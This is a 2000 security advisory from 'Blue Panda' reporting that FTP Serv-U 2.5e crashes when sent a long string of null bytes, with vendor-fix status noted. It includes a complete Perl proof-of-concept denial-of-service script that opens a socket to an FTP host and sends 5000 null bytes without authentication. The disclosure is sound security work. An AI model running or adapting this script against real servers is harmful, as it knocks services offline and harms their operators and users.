=================================================================
Blue Panda Vulnerability Announcement: FTP Serv-U 2.5e
04/08/2000 (dd/mm/yyyy)

bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=================================================================

Problem: Sending FTP Serv-U a string containing a large number of null bytes
will cause it to stack fault. The system Serv-U is running on may become
sluggish/unstable and eventually bluescreen. A valid user/pass combination is
not required to take advantage of this vulnerability.

Vulnerable: FTP Serv-U 2.5e, possibly prior versions (untested).
Immune: FTP Serv-U 2.5f.

Vendor status: Notified. A fix has been released.

===================
Proof of concept:
===================

#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#

use IO::Socket;

$host = "ftp.host.com";
$port = "21";

print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

$counter = 0;
$buf = "";
while ($counter < 5000) {
        $buf .= "\x00";
        $counter += 1;
}
print $socket "$buf\n";

sleep(4);
close($socket);